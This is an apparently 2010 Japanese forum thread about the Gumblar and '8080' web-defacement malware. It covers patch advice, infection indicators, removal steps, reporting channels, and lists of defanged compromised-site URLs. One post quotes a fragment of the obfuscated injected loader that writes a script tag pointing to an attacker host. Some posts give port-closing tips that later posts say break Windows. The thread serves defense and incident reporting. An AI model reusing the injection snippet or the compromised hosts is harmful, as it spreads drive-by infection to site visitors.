【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】

改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください

現時点でGumblar(GENO)、8080(『/*LGPL*/』『/*GNU GPL*/』『/*CODE1*/』)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

＊＊＊ 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ＊＊＊
＊＊＊ 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ＊＊＊

【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合ス2【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263055073/
【関連スレ】
GENOウイルススレ　★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/

【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です

■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
　ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
　編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意！)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic

【アップデート支援ツール】
■ アプリケーションの脆弱性確認ツール
・MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/
・Secunia Personal Software Inspector (PSI)
ttp://secunia.com/vulnerability_scanning/personal/
■ Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
ttp://www.forest.impress.co.jp/docs/review/20091020_323014.html
ttp://hide9999.web.fc2.com/

【Gumblar.x / Daonol(新GENO)ウイルスについて】
■ Gumblar被害拡大中(1)(2)(3)
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2092
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2093
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染！セーフモードでも起動できないパソコンを復旧するには？
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1
レジストリの修復 Windowsを使わずに修復してみる
ttp://pctrouble.lessismore.cc/boot/recover_registry.html
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701

【旧Gumblar(GENO)ウイルスのまとめなど】
＊＊＊ 【注意！】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります ＊＊＊
■ Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
■ GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/

【8080系ウイルスについて】
メディアなどでは「ガンブラー(の亜種)」と紹介されていますが
Gumblar系とは別種のウイルスで、最近のものはページソースの最後あたりに
<script>/*LGPL*/
<script>/*GNU GPL*/
<script>/*CODE1*/
などから始まる難読化したスクリプトが埋め込まれています
2009年12月現在、最新版のAdobe Readerおよびそれ以前の脆弱性を利用しているため
回避策としてAcrobat Javascriptのチェックを外してください
修正版の配布は2010年1月13日の予定です
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を
利用していますがこちらはアップデートで対処できます
感染すると他のウイルスなどを呼び込むため非常に危険です
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106
■ 感染確認(2000,XP)
あくまで現時点での確認方法であることに注意してください

セーフモードから起動してレジストリエディタでRunエントリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
から
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
等の登録があれば感染済

上記の登録情報を削除した上で
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
のファイルを削除すれば復旧しますが、亜種等で違うこともあるので
可能な限りクリーンインストール＆サイト持ちは
安全なPCからのパスワードの変更を推奨します

　　　　　　　　　　　　　　　　　　　　　　　　　 　　 iヽ､
　　　　　　　　　　　　　　　　　　　　　　　　　　　 ﾐ ヽヽ､
　　　　　　　　　　　　　　　　　　　　　　　　　　 ,,,ﾐ　 ）,,,,＼
‐- ．..,,__　　　　　　　カチカチ 　 　　　　　　／　,,;;;;;;;;;;　　"''-､
　　　　　~""'''　‐- ．..,,__　　　　　　　　　 ／,, ,,;;;　;;;;;;''''__,,_,.-'''"l､
　　　　　　　　　　　＿___,,,,,,,,,,,, -------/●);;;;　,;;'''　　　彡　　l ,!
⌒ヽ､　　 _,,-‐‐‐ｆ,"　　;; ;;;　''　　;;;;彡三;_／　　''　　　　　 彡　ﾉ ,,l
　　　ヽ､八　　＼`（,,,,,,,,,イ''''ｰ､,;;;;;;; 　 (（,,,,,..　　 (●>,　 　 __／'';;;;!
　　　　　ヽ`---ー‐‐―‐ン 　　 　'''-l　（ ,.,.,　　　　,;;,,　　　'';;;;;;,,,,/
　　　　　　 ￣￣￣￣￣ 　 　 　 　　l　　メ//l　'';,,,;;'';; '';;; ';,　'';:;/
"''- ．._　　　　　　　　 　　　　　　　 | ／ /メ､|';,,,,,'''';;;;;;;;;;;;;;　ン;ヽ
　 　　　'''- ．._　　　　　____,,,,,,,,,,,,,,-'''''　 ;;;;;;;;;;;`;-;;;-;;;;-;;-;　;;;　;;;l"
　/　　,　　 ,　　"'''- ．. ｆ-''　　 ;;　;; '';;;;;　'''　;;;;;;;;;;;;;;;;;;;;;;;;;_　;;;;;;;;;;;;;l
/　　 /　　/　　/　　 // （⌒　　;;　;; '';;;;;　'''　;; ;;;;;;;;;;;;;;　　　;;;;;;;;;;;;;|
　　 /　　/　　/　　 //　　`''''-､;;;;,,,;;;,,,;;;;;,,;;;;;;;;;; ;;;;;;;;;;;　　,,,, 　;;;;;;;;;;l

GENO（Gumblar）ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1）Microsoft Update（Windows Update）を実行しシステムを最新の状態にする
(2）Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1）Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2）「分類」の中の「JavaScript」を選択
(3）「Acrobat JavaScriptを使用」のチェックをクリア
(4）「OK」ボタンを押す


※サイトを運営されている方は、さらに次のことも実施していただきたい。

(1）管理サイトのページなどに意味不明な文字列が埋め込まれていないか確認する
(2）改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する

　　　　　　　　　　　　　　　　　　　　　　　　　 　　 iヽ､
　　　　　　　　　　　　　　　　　　　　　　　　　　　 ﾐ ヽヽ､
　　　　　　　　　　　　　　　　　　　　　　　　　　 ,,,ﾐ　 ）,,,,＼
‐- ．..,,__　　　　　　　カチカチ 　 　　　　　　／　,,;;;;;;;;;;　　"''-､
　　　　　~""'''　‐- ．..,,__　　　　　　　　　 ／,, ,,;;;　;;;;;;''''__,,_,.-'''"l､
　　　　　　　　　　　＿___,,,,,,,,,,,, -------/●);;;;　,;;'''　　　彡　　l ,!
⌒ヽ､　　 _,,-‐‐‐ｆ,"　　;; ;;;　''　　;;;;彡三;_／　　''　　　　　 彡　ﾉ ,,l
　　　ヽ､八　　＼`（,,,,,,,,,イ''''ｰ､,;;;;;;; 　 (（,,,,,..　　 (●>,　 　 __／'';;;;!
　　　　　ヽ`---ー‐‐―‐ン 　　 　'''-l　（ ,.,.,　　　　,;;,,　　　'';;;;;;,,,,/
　　　　　　 ￣￣￣￣￣ 　 　 　 　　l　　メ//l　'';,,,;;'';; '';;; ';,　'';:;/
"''- ．._　　　　　　　　 　　　　　　　 | ／ /メ､|';,,,,,'''';;;;;;;;;;;;;;　ン;ヽ
　 　　　'''- ．._　　　　　____,,,,,,,,,,,,,,-'''''　 ;;;;;;;;;;;`;-;;;-;;;;-;;-;　;;;　;;;l"
　/　　,　　 ,　　"'''- ．. ｆ-''　　 ;;　;; '';;;;;　'''　;;;;;;;;;;;;;;;;;;;;;;;;;_　;;;;;;;;;;;;;l
/　　 /　　/　　/　　 // （⌒　　;;　;; '';;;;;　'''　;; ;;;;;;;;;;;;;;　　　;;;;;;;;;;;;;|
　　 /　　/　　/　　 //　　`''''-､;;;;,,,;;;,,,;;;;;,,;;;;;;;;;; ;;;;;;;;;;;　　,,,, 　;;;;;;;;;;l

危険ポートを閉じることでセキュリティを強化する。

【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下：DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。

ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。

ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。

ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja

【感染確認方法】
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)

削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索
↓
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除

＊＊＊ テンプレ終了 ＊＊＊

新スレはこちらへ

【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263822552/

>>12を訂正
http://pc11.2ch.net/test/read.cgi/sec/1263822552/
からの続きで使用して下さい。

>>5
>>10
最近の亜種には役に立ちそうもないが一応

【感染確認】
○　C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
×　C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe

【改ざんWebサイトの届出先】
■ JPCERT コーディネーションセンター (JPCERT/CC)
ttps://www.jpcert.or.jp/
・Web サイト改ざんに関する情報提供のお願い
ttp://www.jpcert.or.jp/pr/2010/pr100001.txt
・インシデントの届出
ttps://form.jpcert.or.jp/
・記入例
ttp://www.jpcert.or.jp/pr/2010/form.png
■ Google Safe Browsing: Report a Malware Page
ttp://www.google.com/safebrowsing/report_badware/

【改ざんサイトの調査など】
■ チェッカーサイト
・Gumblar Checker 2
ttp://gumblarchecker.crz.jp/
・aguse
ttp://www.aguse.net/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
■ 専ブラで右クリからの検索を有効にする方法。
設定例：JaneView

設定＞基本＞機能＞コマンド欄で
コマンド名　任意の名前
実行するコマンドに　任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。

これで専ブラから検索でチェックできるようになります。

以下がそのコマンドの一例になります。
Gumblar Checker2=http://gumblarchecker.crz.jp/index.php?url=$LINK&hids=on&code=on&chk=AUTO
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK

>>15の補足
メールで該当サイトに通報する時は
CCにJPCERT/CCのメアドも入れると二度手間が省けるよん

So-netセキュリティ通信
ttp://www.so-net.ne.jp/security/

執筆している会社（株式会社　現代フォーラム）
http://www.gendai-forum.jp/page/sec.html

直近の要点だけまとめてみた
----------
■Exceptionが「/*･･･*/」無しの「DEBUG」に絶賛進化中。
※最新型は前スレ925氏が「DEBUG」と命名。

■あばすと、かすぺ、農怒は「DEBUG」の検体提出済。
※他の提出状況はしらん(報告待ち中)


■検索ワード：".replace(/\(|#|@|&|\^|\$|\)|\!/ig,"

・やふー
ttp://search.yahoo.co.jp/search?p=%22.replace%28%2F%5C%28%7C%23%7C%40%7C%26%7C%5C%5E%7C%5C%24%7C%5C%29%7C%5C%21%2Fig%2C%22&ei=UTF-8&meta=fl%3D3&pstart=1&fr=top_ga1_sa&b=1

・えきさいと
ttp://www.excite.co.jp/search.gw?search=%22.replace%28%2F%5C%28%7C%23%7C%40%7C%26%7C%5C%5E%7C%5C%24%7C%5C%29%7C%5C%21%2Fig%2C%22&submit=%8C%9F%8D%F5&target=combined&look=excite_jp&sstype=excite_d
※Googleセンセイは捜索に向かない(やってみればわかる)

>>19
びんぐ
ttp://www.bing.com/search?q=%22%2Ereplace%28%2F%5C%28%7C%23%7C%40%7C%26%7C%5C%5E%7C%5C%24%7C%5C%29%7C%5C%21%2Fig%2C%22&filt=all

もう新種の出が早すぎて、どういう環境で感染するのは全く分からないな・・・

Googleだと日付が表示できるから検索できれば便利なんだけどな

★★★警告！　試すな危険★★★

>>9の2件は【ルータ】未導入の人用です。
前スレで、安易に手を出した初心者によるトラブルが続出しています。

（どうしても試したい人のための、症状例と救済レジストリ操作等）★保障なし★
ttp://blog.goo.ne.jp/rimotyu/e/4572b0958f2f6881a01be32de9d01ebd
ttp://soudan1.biglobe.ne.jp/qa3068747.html
ttp://weblabo.griffonworks.net/dorlog/2nddorcom/windows/26028.html

今更質問だけど
8080系とか、GumblarにPCが感染すると具体的にどういう症状が出るの？

ボットネットに組み込まれ制御下におかれる。確定した症状は無い。
別な犯罪グループに切り売りされたり(CODE1が一部売られて別なコードになってる)
悪事の片棒担がされたりインチキセキュリティソフト売りつけられたり。

>>24
表面上何も異常がなくても
ある日突然警察がきてPC押収されるかもしれない

Adobe系、JRE等各ソフトが最新、アンチウイルスソフトもこまめに定義更新したらほぼ大丈夫かな？

>>27
大丈夫なんてとても言えない。
ブラウザのスクリプト切っておいてください。
あ、もちろんAdobeリーダーのJavascriptも切るんだよ。

レッツ！テキストブラウジング！

>>28
AdobeリーダーのJavascript、ブラウザでのPDF閲覧はチェック入れてない
IEだとJS関連が面倒そうだが信頼済みサイト機能使ってみるか

対策は、基本的には>>7でいいと思う
それ以上のプラスアルファの対策は、各人の好みで自分の気が済むようにやればいい

これってウイルス作ったやつが捕まらないと永遠に亜種が生まれるの？
それとも自動で亜種が生まれ続けているの？

>>27
OSの更新も忘れないでね！

>>32
作ってるやつが目的を達成するまで続く
自動でうまれることはない

>>34
じゃあ作ってるやつが捕まれば終息に向かうってことか
でも誰が作ったんだろうね？
出所から察するにロシアの悪質プログラマーなんだろうけど…

セキリュティソフトのベンダーがマッチポンプ・・・考え過ぎ？

ウイルスこわいでちゅ

任天堂がマジコン訴訟をとりさげるまで

ロシアのドメインを使ってるからって作成者もロシアとは限らんし、
似たようなのを別の誰かが作るかもしれないし

昔のコンピュータウイルスって可愛い動作のものも沢山あったよね
アウトルックでプレビューウインドウを開いているとで感染
載っているアドレスにスパムメールを送る位だったのに・・・

今はもうアドビば修正したのかも知れないけど
アドビの1ヶ月パッチ放置によって
アクロバット使用者が感染し、その人のブログ、HPが改竄され、
その改竄されたHPを踏むと、今度はそのユーザーブログが改竄され
個人情報まで抜かれるしまつ。

10年後にはどんな凶悪なウイルスが出てくるんだろ・・・

穴探すやつ、ウイルス作るやつ、配布するやつ、
ドメイン手配するやつ、botのタスク受けるやつ
分業化してると想う、今はbotクラウドの構築段階じゃないかな

昔のウィルスといえば普通にHDDのなかみ消したり
起動不能に陥らせてたりしてたとおもうが
5,6年前のは可愛いのおおかったがな

俺ネット歴浅いからよく知らんけど
昔はアルプス一万尺が延々と流れてくるウイルスなんてのもあったみたいだね
AIがとまらないって漫画で見たことある
なんか、最近のウイルスはその漫画のラスボスのゼロスパイダーとかみたいなのが
現実に出てきてるみたいで怖い

最近のウィルスはおそろしくなったな

http://pc11.2ch.net/test/read.cgi/sec/1263822552/452
再発 　/DEBUG/
例の上映会とこ。。。
前スレの人、またつーほーおながいします。

whois上流のとこ届かなかったみたいぽ。

>>45
パスワードとか変えなかったのかよorz

他人が書き換えるのをいたずら書きぐらいに思ってるんじゃないかな
異常な状態にあることをわかってもらう必要がありそう

また届かないかもしれないけどwhois上流にめるはしてあります。

株式会社KDDIウェブコミュニケーションズの人ここ見てますかぁ〜

【Gumblar】混ぜるな危険【8080系】

■Gumblar(たぶん消滅済)
2009/4〜6に猛威を振るったやつ。
GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。

■Gumblar.x
2009/10〜12に出現。
挿入するコードがGumblarのそれと同じだった為、
Gumblarの進化型(亜種？)と言われていた。
Gumblar.xは12月中旬にコードごと消滅、以後追跡不能。
※残骸が残っているサイトがあるが、現在は基本的に無害。

■8080系(GNU GPL、CODE1、LGPL、Exception、DEBUG)
Gumblar.xが消滅した直後に出現し、今現在も猛威を振るっている。
※セキュリティソフト依存の防御は非常に危険です。

8080系は、Gumblar用の対策方法には載ってない
「Java(JRE)」の脆弱性を突いているので、Gumblarと8080系を混同して
Gumblar用の対策を施し、「これで大丈夫(ｷﾘｯ」とか言ってると、
踏んだ地雷が爆発→→→　＼(＾o＾)／オワタ　なんて事に(なるかも？)

>>49
乙age

SymantecがFlashPlayerを誤検出
ttp://isc.sans.org/diary.html?storyid=8104

>>9とか載せんなよ　ハゲ

>>9と>>49を差し替えたほうが・・・

スレたった日付をよく見ろハゲ

>>27
JREもセキュリティホールになってたのか・・・orz
油断できないな・・・

>>2-55はハゲ

>>1-56はクズ

関西の自主上映団体
ttp://www.rcsmovie.co●jp/

こんなん↓書いてありますけど？

一部のセキュリティソフトにおいて、
当ホームページへのアクセス遮断や、
感染警告の表示などが発生している様です。
早急な対応を試みておりますが、
じゅうぶんご注意ください。

>>58
デジャビュ・・・いや既出だろそれ

てｓ

>>58
前スレ452と510で既出。

コピペですいません。

北斗の更新切らしてしまって、なんかヘンなサイトを踏んでしまい、
トロイの木馬警告が出ましたんで、もう一回踏んでみたら、
マカフィー無料スキャンで「JS/Redirector.cに感染しました」と出ました。
そこでウイルスキラーゼロを買ってきて、スキャンさせても「感染0」
もう一度マカフィー無料スキャンをやってみても「感染0」になります。
これは感染しているのでしょうか？

スレ違い

ttp://bb21.b2c-21●com/z1z00046/
ttp://kasim.kashima136●com/z19z00703/
みたいな/z△z00○○○/ってページがz1zからz19zまではあるし
(19x1000ページはあるんだろうね)

ttp://dingo.hichigosan●com/excessive-perspiration-japan/
ttp://dooon.konrei●org/foreign-exchange-japan/
みたいに最後にjapanのつくページとか山ほどあるよね。
どうにもならんよね

>>9
前スレから転載
----------
669 ：名無しさん＠お腹いっぱい。：2010/01/25(月) 13:49:48

素人はRPCを絶対いじるな
ttp://blog.goo.ne.jp/rimotyu/e/4572b0958f2f6881a01be32de9d01ebd
ttp://soudan1.biglobe.ne.jp/qa3068747.html
ttp://weblabo.griffonworks.net/dorlog/2nddorcom/windows/26028.html
----------

　　　ﾊ,,..,,ﾊ
　　/;;・ω・;;ヽ　
.　 (;(　^^^　);)
　　`'ｰ---‐´
トトロイ
（2010〜）

玄人ならRPCを止めてもちゃんと動く

>>64
tp://bb21.b2c-21●com以下の階層のﾍﾟｰｼﾞ　0件

tp://kasim.kashima136●com以下の階層のﾍﾟｰｼﾞ　31件
↓
/z19z00701
/z19z00703
/z19z00705
/z19z00707
/z19z00710
/danjiki/
/hair/
/bust/
/bland/
面倒だから、以下略とす

今なら admachiko で検索すればいっぱい引っかかるよ。
こーゆーのどーすればいーのさ

それgumblarや8080と関係なくね

>>69
ソースみてみ

>>68
DEBUGじゃない．．．

;document.write('<scr'+'ipt src=h'+'ttp://'+Xiabbjepv1.replace(/Widcfpac5ixzc/g, '8080')+'></scr'+'ipt>');} } catch(Xixc9uyr ) {}
http://apopo●apparelarc-xml●org/z1z00712/

>>71
再改竄
park5●wakwak●com/~izushichi/mikura/index●html
ここは「.ru:Bxj118lelf/」になってる。

.ru:XXXXの部分は
何らかの法則、又はランダムで生成してるような希ガス

昨日のDEBUGは本当にDEBUGだったのか･･･

あーmegaidもDEBUGもランダムになっちまったか…

>>64,>>71
whoisみたら同じとこみたい、める一通しました。

>>72
あばばばば

すみません
以前に>>9を見てポート445を閉じてしまったのですが
元に戻す場合には「スタートアップ」の種類を何に変更すればいいのでしょうか？

うちはシステムになってるな

>>75
うちもシステムになっているよ＠XP SP2

>>76>>77
どうもありがとうございます
自分のも確か最初はシステムだったなと思っていたので
システムにしてみます

>>49
8080系ってＪＲＥを利用してるの？
adobeの更新がどうのこうの話題になってたけど。

>>79
使う。Java6Update17未満だとやられる。
WindowsのもあるけどこれはWindowsUpdateで阻止できるので脅威ではない。

JREってアップデートしても古いの残ったままだけど、
古いの削除しないとヤバイ？

>>80
そこまで新しくなくても今のところは大丈夫
ダメなのは
JRE 6 Update 11未満
JRE 5.0 Update 17未満
JRE 1.4.2_19未満

あと8080系はクリスマス頃から未修整だったAdobe Readerの脆弱性を使うようになった。
ほかの攻撃内容は帰ってきたGumblar並みだったのに、
ここまでひどいことになったのはこの2つのおかげだと思う。

心配ならとりあえずJAVAの実行を切っとけばいい。

>>81
ttps://www.ccc.go.jp/detail/web/
企業などで特定のバージョンのJREを必要とする場合はありますが、
それ以外の場合では旧バージョンをアンインストールすることをお薦めします

www.rcsmovie.co●jp/index.html
凸完了

注入されるコードは頻繁に変わってるけど本体を呼び出すコードは何の変化もなしか・・

ガンブラーなんてゴミ箱ポイポイのポイよ

「プログラムの追加と削除」リストにJava Runtime Environmentが無いんだけど
これは入ってないってことでいいの？
ttp://www.java.com/ja/で確認したんだけど良く分からん

>>88
俺のところでは Java(TM) 6 Update 17 となってるな

今JAVA(TM)6 UPDATE 17とJ2SE RUNTIME ENVIRONMENT5.0
がインストールされてます、ADOBE製品はFLASHPLAYER10
しか使ってないんですが一応の対策はこれでＯＫですか？
ウイルスソフトはNIS2009使ってます

>>89
「プログラムの追加と削除」リストを名前順に並べて
I-O DATA
Microsoft (C＋＋等四つほどあり)
NVIDIA(ドライバ)
となっています
Javaの文字は無いのでインストールされてないようです
>>7の他の対処法でJREだけやっていなかったのでとりあえず安心できます
ありがとうございました

Java は Update 18 が最新
バージョンチェックは↓でどうぞ
ttp://jvndb.jvn.jp/apis/myjvn/#VCCHECK

×>>7の他の対処法で
○>>7の対処法で

【陥落サイト情報】
※名無し最新型は「.ru:X」と記す

沖縄情報ガイド(.ru:X)
tp://www●okiinfo●com/
※サイト内全域？

価格比較　GIOS(GNU GPL)＊再改竄＊
tp://shop●relax-living●net/bike11/
※トップページは絶賛崩壊中
にしてもGNU GPLって･･･orz

中古車情報の朝日オート(DEBUG)
tp://horizon●f00●jp/
※通報済、未対応

ジェイティメタル(CODE1)
tp://www●jtmetal●jp/data/index2●html
漢方 コバヤシ薬局(.ru:X、DEBUG)
tp://www●sbest-drug●com/


つーほヨロ･･

あまり詳しくないので質問。
>>2で最新版（Java（ＴＭ）6Update18）にすれば、
・「ＪＲＥを使われる穴がふさがるよ」なのか
・「ＪＲＥが新しくなって穴がふさがるよ」なのかどっちなんだろう…

こないだアップデートしてJava（ＴＭ）6Update18にしたが
Java （ＴＭ） SE　Runtime Environment Update 1は特に変化がない…。
確認ページでも最新版がすでにあるといわれる…

ＪＲＥはいらないなら削除してもいいのかなぁ

JAVA関係は一旦総てアンインスコ後に掃除してから最新版をインスコ汁

ＪAVA(TM)6 UPDATE 17とJ2SE RUNTIME ENVIRONMENT5.0の両方削除して
JAVA(TM)6 UPDATE 18入れました

>>72
>何らかの法則、又はランダムで生成してるような希ガス

さすが田宮さんｗ

>>94
コメント無しは固定だったmegaidとDEBUGが可変文字列に変わったようなものだから
ru:XよりDEBUG改とかにした方が特徴的に分かり易くないかな。

ロシア多いな

>>99
結局固定文字列は「8080」くらいしか残ってなかったり

>>94
沖縄情報
ジェイ・ティ・メタル
漢方 コバヤシ薬局
以上whoisよりめるぽしました。

> 崩壊中
ひょっとして管理者とクラッカーの上書き合戦だったりして。。。

連日のように新型が生まれてて恐ろしいな

誘導方法や突かれる脆弱性には変化がないのに新型というのはどうかな。
亜種や変種とした方が語弊がないと思う。

めんどくさいから「改良型」でいいんじゃないかな

鯖缶が怠慢なため
こんなことに...
管理用端末で余所のwebページ閲覧するなよ
毎日パス変えとけボケ

ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter01/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter04/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter02/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter05/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter08/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter03/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter07/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter01/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter06/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter02/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter05/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter08/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter03/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter01/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter06/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter04/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter02/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter05/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter08/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter03/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter07/index●html

セキュリティソフトですが

Avast と　MSのやつ　だと　どっちがいいですか？

>>108
たぶんavast、ただしまだv4の方がトラブルが少なく安定だと思う
MSEにはWeb監視機能が無い→発見したときは(実害は無くとも)すでに侵入されてる可能性

【so-netセキュリティ通信】

「ガンブラー」「サイト改ざん」めぐる基本のＱ＆Ａ　〜　何が起きている？ 対策は？
http://www.so-net.ne.jp/security/news/newstopics_201001.html
※よくわかってない人は必読

サイト改ざん止まず(1) 修復サイト再汚染が多発、PW変更/感染チェックを
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2138

サイト改ざん止まず(2) 改ざんサイト告知一覧（2010年1月14日〜1月28日）
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2139

DEBUG→.ru:XXXXには触れてないが、相変わらず早いなw

改ざんサイト　大手だけでなく同人・ファンサイトの公表はないのかな

>>111
so-netの所では
企業のサイトは(認めてる所は)公表するけど
個人のサイトは難しいのでは？

ここに晒すのもちょっとはばかれるけど、もし見つけたらどうしたものか・・・
